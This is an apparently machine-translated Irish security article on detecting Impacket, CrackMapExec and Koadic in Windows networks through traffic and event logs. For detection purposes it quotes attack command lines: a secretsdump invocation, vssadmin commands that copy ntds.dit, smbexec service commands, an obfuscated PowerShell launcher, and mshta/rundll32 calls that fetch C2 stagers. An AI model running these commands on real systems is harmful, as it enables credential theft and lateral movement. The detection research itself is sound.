Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker

Tá líon na n-ionsaithe san earnáil chorparáideach ag fás gach bliain: mar shampla in 2017, taifeadadh 13% níos mó teagmhais uathúla ná in 2016, agus ag deireadh 2018 - 27% níos mó teagmhaisná sa tréimhse roimhe sin. Lena n-áirítear iad siúd a bhfuil an príomh-uirlis oibre an córas oibriúcháin Windows. In 2017-2018, an APT Dragonfly, APT28, APT MuddyWater rinne sé ionsaithe ar eagraíochtaí rialtais agus míleata san Eoraip, i Meiriceá Thuaidh agus san Araib Shádach. Agus d’úsáideamar trí uirlis chuige seo - Impaicéad, CrackMapExec и Koadic. Tá a gcód foinse oscailte agus ar fáil ar GitHub.

Is fiú a thabhairt faoi deara nach n-úsáidtear na huirlisí seo le haghaidh treá tosaigh, ach chun ionsaí a fhorbairt laistigh den bhonneagar. Úsáideann ionsaitheoirí iad ag céimeanna éagsúla den ionsaí tar éis dul i bhfód ar an imlíne. Tá sé seo, dála an scéil, deacair a bhrath agus go minic ach amháin le cabhair na teicneolaíochta rianta comhréitigh sa trácht líonra a shainaithint nó uirlisí a cheadaíonn gníomhartha gníomhacha ionsaitheora a bhrath tar éis dó dul isteach sa bhonneagar. Soláthraíonn na huirlisí feidhmeanna éagsúla, ó chomhaid a aistriú go dtí idirghníomhú leis an gclárlann agus orduithe a fhorghníomhú ar mheaisín cianda. Rinneamar staidéar ar na huirlisí seo chun a ngníomhaíocht líonra a chinneadh.

Cad ba ghá dúinn a dhéanamh:

  • A thuiscint conas a oibríonn uirlisí hacking. Faigh amach cad a chaithfidh ionsaitheoirí a shaothrú agus cad iad na teicneolaíochtaí is féidir leo a úsáid.
  • Faigh an rud nach n-aimsíonn uirlisí slándála faisnéise sna chéad chéimeanna d’ionsaí. Is féidir céim an taiscéalaíochta a fhágáil ar lár, toisc gur ionsaitheoir inmheánach é an t-ionsaitheoir, nó toisc go bhfuil an t-ionsaitheoir ag saothrú poll sa bhonneagar nach raibh ar eolas roimhe seo. Éiríonn sé indéanta slabhra iomlán a ghníomhartha a athbhunú, agus mar sin an fonn gluaiseacht bhreise a bhrath.
  • Deireadh a chur le dearfacha bréagacha ó uirlisí braite ionsáite. Ní mór dúinn dearmad a dhéanamh, nuair a bhraitear gníomhartha áirithe ar bhonn taiscéalaíochta amháin, gur féidir earráidí minice a dhéanamh. De ghnáth sa bhonneagar tá go leor bealaí ann, nach féidir a aithint ó na cinn dhlisteanacha ar an gcéad amharc, chun aon fhaisnéis a fháil.

Cad a thugann na huirlisí seo d'ionsaitheoirí? Más Impacket é seo, faigheann ionsaitheoirí leabharlann mhór de mhodúil ar féidir iad a úsáid ag céimeanna éagsúla den ionsaí a leanann tar éis an imlíne a bhriseadh. Úsáideann go leor uirlisí modúil Ipacket go hinmheánach - mar shampla, Metasploit. Tá dcomexec agus wmiexec aige chun cianorduithe a fhorghníomhú, agus tá rúndiamhra aige chun cuntais a fháil ón gcuimhne a chuirtear leis ó Impacket. Mar thoradh air sin, cinnteoidh brath ceart ar ghníomhaíocht leabharlann den sórt sin go ndéanfar díorthaigh a bhrath.

Ní comhtharlú é gur scríobh na cruthaitheoirí “Powered by Impacket” faoi CrackMapExec (nó go simplí CME). Ina theannta sin, tá feidhmiúlacht réidh-déanta ag CME le haghaidh cásanna coitianta: Mimikatz chun pasfhocail a fháil nó a hashes, feidhmiú Meterpreter nó gníomhaire Impireacht le haghaidh forghníomhú cianda, agus Bloodhound ar bord.

Ba é Koadic an tríú uirlis a roghnaigh muid. Tá sé sách le déanaí, cuireadh i láthair é ag an gcomhdháil hacker idirnáisiúnta DEFCON 25 in 2017 agus déantar idirdhealú a dhéanamh air trí chur chuige neamhchaighdeánach: oibríonn sé trí HTTP, Java Script agus Microsoft Visual Basic Script (VBS). Tugtar maireachtáil lasmuigh den talamh ar an gcur chuige seo: úsáideann an uirlis sraith spleáchais agus leabharlanna atá ionsuite i Windows. Tugann na cruthaitheoirí COM Command & Control, nó C3 air.

IMPACKET

Tá feidhmiúlacht Impacket an-leathan, ó thaiscéalaíocht laistigh de AD agus sonraí a bhailiú ó fhreastalaithe inmheánacha MS SQL, go teicnící chun dintiúir a fháil: is ionsaí sealaíochta SMB é seo, agus an comhad ntds.dit a fháil ina bhfuil hashes pasfhocail úsáideora ó rialtóir fearainn. Déanann Impacket orduithe a fhorghníomhú go cianda ag baint úsáide as ceithre mhodh éagsúla: WMI, Seirbhís Bainistíochta Sceidealóir Windows, DCOM, agus SMB, agus éilíonn sé dintiúir chun é sin a dhéanamh.

Dumpáil rúin

Breathnaímis ar dhumpáil rúin. Is modúl é seo ar féidir díriú ar mheaisíní úsáideoirí agus ar rialtóirí fearainn araon. Is féidir é a úsáid chun cóipeanna de limistéir chuimhne LSA, SAM, SECURITY, NTDS.dit a fháil, ionas gur féidir é a fheiceáil ag céimeanna éagsúla den ionsaí. Is é an chéad chéim in oibríocht an mhodúil ná fíordheimhniú trí SMB, a éilíonn pasfhocal an úsáideora nó a hash chun an t-ionsaí Pas an Hash a dhéanamh go huathoibríoch. Ansin tagann iarratas chun rochtain ar Bhainisteoir Rialaithe Seirbhíse (SCM) a oscailt agus rochtain a fháil ar an gclár tríd an bprótacal winreg, trína bhféadfaidh ionsaitheoir sonraí na mbrainsí spéise a fháil amach agus torthaí a fháil trí SMB.

I bhFíor. 1 feicimid conas go díreach agus an prótacal winreg in úsáid, a fhaightear rochtain ag baint úsáide as eochair chláraithe le LSA. Chun seo a dhéanamh, bain úsáid as an ordú DCERPC le opcode 15 - OpenKey.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 1. Eochair clárlainne a oscailt ag baint úsáide as an bprótacal winreg

Ansin, nuair a fhaightear rochtain ar an eochair, sábhálfar na luachanna leis an ordú SaveKey le opcode 20. Déanann Impacket é seo ar bhealach an-sonrach. Sábhálann sé na luachanna chuig comhad a bhfuil a ainm teaghrán de 8 gcarachtar randamach i gceangal le .tmp. Ina theannta sin, tarlaíonn uaslódáil bhreise an chomhaid seo trí SMB ón eolaire System32 (Fíor 2).

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 2. Scéim chun eochair chláraithe a fháil ó chianinneall

Tarlaíonn sé gur féidir gníomhaíocht den sórt sin ar an líonra a bhrath trí fhiosruithe chuig brainsí áirithe den chlár ag baint úsáide as an bprótacal winreg, ainmneacha sonracha, orduithe agus a n-ord.

Fágann an modúl seo rianta i loga imeachta Windows freisin, rud a fhágann go bhfuil sé éasca é a bhrath. Mar shampla, mar thoradh ar an ordú a fhorghníomhú

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

I logáil Windows Server 2016 feicfimid an príomhsheicheamh imeachtaí seo a leanas:

1. 4624 - Logógáil cianda.
2. 5145 - cearta rochtana ar chiansheirbhís winreg a sheiceáil.
3. 5145 - ag seiceáil cearta rochtana comhad san eolaire System32. Tá an t-ainm randamach atá luaite thuas ar an gcomhad.
4. 4688 - ag cruthú próiseas cmd.exe a sheolann vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ag cruthú próiseas leis an ordú:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - ag cruthú próiseas leis an ordú:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - ag cruthú próiseas leis an ordú:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Cosúil le go leor uirlisí iarshaothraithe, tá modúil ag Impacket chun orduithe a fhorghníomhú go cianda. Díreoimid ar smbexec, a sholáthraíonn blaosc ordú idirghníomhach ar mheaisín cianda. Teastaíonn fíordheimhniú ón SMB don mhodúl seo freisin, le pasfhocal nó le hash pasfhocail. I bhFíor. I bhFíor 3 feicimid sampla de conas a oibríonn uirlis den sórt sin, sa chás seo is é an consól riarthóir áitiúil é.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 3. Consól idirghníomhach smbexec

Is é an chéad chéim de smbexec tar éis fíordheimhnithe ná an SCM a oscailt leis an ordú OpenSCManagerW (15). Is díol suntais an cheist: tá réimse MachineName DUMMY.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 4. Iarratas chun Bainisteoir Rialaithe Seirbhíse a oscailt

Ansin, cruthaítear an tseirbhís ag baint úsáide as an ordú CreateServiceW (12). I gcás smbexec, is féidir linn an loighic tógála ordú céanna a fheiceáil gach uair. I bhFíor. Léiríonn 5 glas paraiméadair ordú nach féidir a athrú, léiríonn buí cad is féidir le ionsaitheoir a athrú. Is furasta a fheiceáil gur féidir ainm an chomhaid inrite, a eolaire agus an comhad aschuir a athrú, ach tá sé i bhfad níos deacra an chuid eile a athrú gan cur isteach ar loighic an mhodúil Impacket.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 5. Iarratas chun seirbhís a chruthú ag baint úsáide as Bainisteoir Rialaithe Seirbhíse

Fágann Smbexec freisin rianta soiléire i logáil imeachtaí Windows. I logáil Windows Server 2016 don bhlaosc ordaithe idirghníomhach leis an ordú ipconfig, feicfimid an t-ord na n-imeachtaí seo a leanas:

1. 4697 — suiteáil na seirbhíse ar mheaisín an íospartaigh:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - cruthú an phróisis cmd.exe leis na hargóintí ó phointe 1.
3. 5145 - ag seiceáil cearta rochtana ar an gcomhad __aschuir san eolaire C$.
4. 4697 — suiteáil na seirbhíse ar mheaisín an íospartaigh.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - cruthú an phróisis cmd.exe leis na hargóintí ó phointe 4.
6. 5145 - ag seiceáil cearta rochtana ar an gcomhad __aschuir san eolaire C$.

Is é Impacket an bonn d'fhorbairt uirlisí ionsaithe. Tacaíonn sé le beagnach gach prótacal i mbonneagar Windows agus ag an am céanna tá a saintréithe féin. Seo iarratais winreg ar leith, agus úsáid an API SCM le foirmiú ordaithe tréith, agus an fhormáid ainm comhaid, agus SMB share SYSTEM32.

CRACKMAPEXEC

Tá an uirlis CME deartha go príomha chun na gnáthghníomhartha sin a chaithfidh ionsaitheoir a dhéanamh chun dul chun cinn laistigh den líonra a uathoibriú. Ligeann sé duit oibriú i gcomhar leis an ngníomhaire cáiliúil Impireacht agus Meterpreter. Chun orduithe a fhorghníomhú go rúnda, is féidir le CME iad a cheilt. Trí úsáid a bhaint as Bloodhound (uirlis taiscéalaíochta ar leith), is féidir le hionsaitheoir an cuardach do sheisiún gníomhach riarthóra fearainn a uathoibriú.

Bloodhound

Ceadaíonn Bloodhound, mar uirlis neamhspleách, ard-thaiscéalaíocht laistigh den líonra. Bailíonn sé sonraí faoi úsáideoirí, meaisíní, grúpaí, seisiúin agus soláthraítear mar script PowerShell nó comhad dénártha. Úsáidtear prótacail LDAP nó SMB-bhunaithe chun faisnéis a bhailiú. Ceadaíonn an modúl comhtháthú CME Bloodhound a íoslódáil chuig meaisín an íospartaigh, na sonraí a bhailítear a rith agus a fháil tar éis a fhorghníomhaithe, agus ar an gcaoi sin gníomhartha sa chóras a uathoibriú agus iad a dhéanamh níos lú faoi deara. Cuireann sliogán grafach Bloodhound na sonraí bailithe i láthair i bhfoirm graif, a ligeann duit an cosán is giorra a fháil ó mheaisín an ionsaitheora go dtí an riarthóir fearainn.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 6. Comhéadan Bloodhound

Chun oibriú ar mheaisín an íospartaigh, cruthaíonn an modúl tasc ag baint úsáide as ATSVC agus SMB. Is comhéadan é ATSVC chun oibriú le Sceidealóir Tasc Windows. Úsáideann CME a fheidhm NetrJobAdd(1) chun tascanna a chruthú thar an líonra. Taispeántar sampla den mhéid a sheolann an modúl CME i bhFíor. 7: Seo glaoch ordaithe cmd.exe agus cód obfuscated i bhfoirm argóintí i bhformáid XML.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Fíor.7. Tasc a chruthú trí CME

Tar éis don tasc a bheith curtha isteach lena fhorghníomhú, tosaíonn meaisín an íospartaigh Bloodhound féin, agus is féidir é seo a fheiceáil sa trácht. Tá an modúl tréithrithe ag fiosrúcháin LDAP chun grúpaí caighdeánacha a fháil, liosta de na meaisíní agus na húsáideoirí go léir san fhearann, agus faisnéis a fháil faoi sheisiúin úsáideoirí gníomhacha trí iarratas SRVSVC NetSessEnum.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 8. Liosta de sheisiúin ghníomhacha a fháil trí SMB

Ina theannta sin, tá imeacht le ID 4688 (cruthú próisis) agus ainm an phróisis ag gabháil le seoladh Bloodhound ar mheaisín íospartaigh le hiniúchadh cumasaithe «C:WindowsSystem32cmd.exe». Rud atá suntasach faoi seo, is iad na hargóintí na n-orduithe:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Tá an modúl enum_avproducts an-suimiúil ó thaobh feidhmiúlacht agus cur i bhfeidhm. Ligeann WMI duit teanga na gceisteanna WQL a úsáid chun sonraí a aisghabháil ó oibiachtaí éagsúla Windows, agus is é sin go bunúsach a úsáideann an modúl CME seo. Gineann sé fiosruithe chuig na ranganna AntiSpywareProduct agus AntiМirusProduct faoi na huirlisí cosanta atá suiteáilte ar mheaisín an íospartaigh. Chun na sonraí riachtanacha a fháil, nascann an modúl leis an ainmspás rootSecurityCenter2, gineann sé ceist WQL agus faigheann sé freagra. I bhFíor. Léiríonn Fíor 9 a bhfuil sna hiarratais agus sna freagraí sin. In ár sampla, fuarthas Windows Defender.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 9. Gníomhaíocht líonra an mhodúil enum_avproducts

Go minic, d’fhéadfadh iniúchóireacht WMI (Trace WMI-Activity), ar féidir leat faisnéis úsáideach a fháil ina gcuid imeachtaí faoi cheisteanna WQL, a bheith faoi mhíchumas. Ach má tá sé cumasaithe, ansin má reáchtáiltear an script enum_avproducts, sábhálfar imeacht le ID 11. Beidh ainm an úsáideora a sheol an t-iarratas agus an t-ainm san ainmspás rootSecurityCenter2 ann.

Bhí a chuid déantúsáin féin ag gach modúl CME, bíodh siad ina gceisteanna sonracha WQL nó ag cruthú cineál áirithe taisc i sceidealóir tascanna a raibh obfuscation agus gníomhaíocht a bhaineann go sonrach le Bloodhound i LDAP agus SMB.

KOADIC

Gné shainiúil de Koadic is ea úsáid a bhaint as ateangairí JavaScript agus VBScript atá ionsuite i Windows. Sa chiall seo, leanann sé an treocht maireachtála as an talamh - is é sin, tá sé aon spleáchais seachtracha agus úsáideann sé uirlisí Windows caighdeánach. Is uirlis é seo le haghaidh Ordú agus Rialú iomlán (CnC), mar tar éis an ionfhabhtaithe tá “ionchlannán” suiteáilte ar an meaisín chun é a rialú. Tugtar “zombie” ar a leithéid de mheaisín, i dtéarmaíocht Koadic. Mura bhfuil dóthain pribhléidí ann le haghaidh oibriú iomlán ar thaobh an íospartaigh, tá an cumas ag Koadic iad a ardú trí úsáid a bhaint as teicnící seachbhóthar um Rialú Cuntas Úsáideora (seachbhóthar UAC).

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 10. Sliogán Koadic

Ní mór don íospartach cumarsáid a thionscnamh leis an bhfreastalaí Ordú & Rialaithe. Chun seo a dhéanamh, ní mór di dul i dteagmháil le URI ullmhaithe roimhe seo agus an príomhchorp Koadic a fháil ag baint úsáide as ceann de na stáitse. I bhFíor. Taispeánann Figiúr 11 sampla don stáitse mshta.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 11. Seisiún a thosú leis an bhfreastalaí CNC

Bunaithe ar an athróg freagartha WS, bíonn sé soiléir go dtarlaíonn forghníomhú trí WScript.Shell, agus go bhfuil faisnéis thábhachtach faoi pharaiméadair an tseisiúin reatha sna hathróga STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE. Is é seo an chéad péire iarratas-freagra i nasc HTTP le freastalaí CNC. Baineann iarratais ina dhiaidh sin go díreach le feidhmiúlacht na modúl ar a dtugtar (ionchlannáin). Ní oibríonn gach modúl Koadic ach le seisiún gníomhach le CNC.

Mimikatz

Díreach mar a oibríonn CME le Bloodhound, oibríonn Koadic le Mimikatz mar chlár ar leith agus tá bealaí iomadúla aige chun é a sheoladh. Anseo thíos tá péire iarratas-freagra chun an ionchlannán Mimikatz a íoslódáil.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 12. Aistrigh Mimikatz go Koadic

Is féidir leat a fheiceáil mar a d'athraigh an fhormáid URI san iarratas. Tá luach ann anois don athróg csrf, atá freagrach as an modúl roghnaithe. Ná tabhair aird ar a hainm; Tá a fhios againn go léir go dtuigtear CSRF ar bhealach difriúil de ghnáth. Ba é an príomhchorp céanna de Koadic an fhreagairt, ar cuireadh cód a bhaineann le Mimikatz leis. Tá sé sách mór, mar sin déanaimis féachaint ar na príomhphointí. Anseo tá leabharlann Mimikatz ionchódaithe i base64, rang sraitheach .NET a instealladh é, agus argóintí chun Mimikatz a sheoladh. Tarchuirtear an toradh forghníomhaithe thar an líonra i dtéacs soiléir.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 13. Toradh ar rith Mimikatz ar mheaisín cianda

Exec_cmd

Tá modúil ag Koadic freisin ar féidir leo orduithe a fhorghníomhú go cianda. Anseo feicfimid an modh giniúna URI céanna agus na hathróga sid agus csrf aithnidiúla. I gcás an mhodúil exec_cmd, cuirtear cód leis an gcomhlacht atá in ann orduithe bhlaosc a fhorghníomhú. Taispeántar thíos a leithéid de chód atá i bhfreagra HTTP an fhreastalaí CNC.

Conas ionsaithe ar bhonneagar Windows a bhrath: ag déanamh staidéir ar uirlisí hacker
Rís. 14. Cód implant exec_cmd

Tá an athróg GAWTUUGCFI leis an tréith WS eolach ag teastáil chun cód a fhorghníomhú. Le cabhair uaidh, glaonn an implant an bhlaosc, ag próiseáil dhá bhrainse de chód - shell.exec leis an sruth sonraí aschuir agus shell.run gan filleadh.

Ní gnáthuirlis é Koadic, ach tá a chuid déantúsáin féin aige trínar féidir é a fháil sa trácht dlisteanach:

  • foirmiú speisialta iarratais HTTP,
  • ag baint úsáide as winHttpRequests API,
  • réad WScript.Shell a chruthú trí ActiveXObject,
  • comhlacht inrite mór.

Is é an stáitse a thionscnaíonn an nasc tosaigh, agus mar sin is féidir a ghníomhaíocht a bhrath trí imeachtaí Windows. Maidir le mshta, is é seo imeacht 4688, a léiríonn cruthú próisis leis an tréith tosaigh:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Cé go bhfuil Koadic ar siúl, is féidir leat imeachtaí 4688 eile a fheiceáil a bhfuil tréithe a bhaineann go foirfe leis:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Torthaí

Tá an treocht maireachtála lasmuigh den talamh ag éirí níos coitianta i measc coirpeach. Úsáideann siad na huirlisí agus na meicníochtaí atá ionsuite i Windows dá gcuid riachtanas. Tá uirlisí móréilimh Koadic, CrackMapExec agus Impacket ag leanúint an phrionsabail seo le feiceáil níos mó i dtuarascálacha APT. Tá líon na bhforcanna ar GitHub le haghaidh na n-uirlisí seo ag fás freisin, agus tá cinn nua le feiceáil (tá thart ar mhíle acu cheana féin). Tá an treocht ag éirí níos coitianta mar gheall ar a simplíocht: ní bhíonn uirlisí tríú páirtí ag teastáil ó ionsaitheoirí; tá siad ar mheaisíní na n-íospartach cheana féin agus cabhraíonn siad leo bearta slándála a sheachaint. Dírímid ar staidéar a dhéanamh ar chumarsáid líonra: fágann gach uirlis a thuairiscítear thuas a rianta féin sa trácht líonra; thug staidéar mionsonraithe orthu deis dúinn ár dtáirge a mhúineadh Fionnachtain Ionsaí Líonra PT iad a bhrath, rud a chabhraíonn ar deireadh le himscrúdú a dhéanamh ar an slabhra iomlán de chibeartheagmhais a bhaineann leo.

Údair:

  • Anton Tyurin, Ceann na Roinne Seirbhísí Saineolaithe, Ionad Slándála Saineolaithe PT, Positive Technologies
  • Egor Podmokov, saineolaí, Ionad Slándála Saineolaithe PT, Teicneolaíochtaí Dearfacha

Foinse: will.com

Add a comment